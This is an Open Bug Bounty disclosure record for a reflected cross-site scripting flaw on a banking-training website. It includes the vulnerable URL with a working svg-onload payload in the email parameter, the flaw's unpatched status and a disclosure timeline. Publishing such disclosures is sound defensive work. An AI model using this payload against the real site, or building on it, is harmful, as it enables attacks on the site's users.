Vulnerable URL:
https://banking.talentsprint.com/accounts/login?email=xss%3C/span%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&action;=auto-login&next;=
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
05.08.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
Unknown / Not calculated |
VIP website status: |
No |
Check banking.talentsprint.com SSL connection: |
(Grade: A-) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
13 May, 2017 14:56 GMT |
Generic security notifications sent to website owner |
13 May, 2017 14:58 GMT |
Notification sent to subscribers (without technical details) |
13 May, 2017 18:17 GMT |
Vulnerability details disclosed by researcher |
5 August, 2017 15:15 GMT |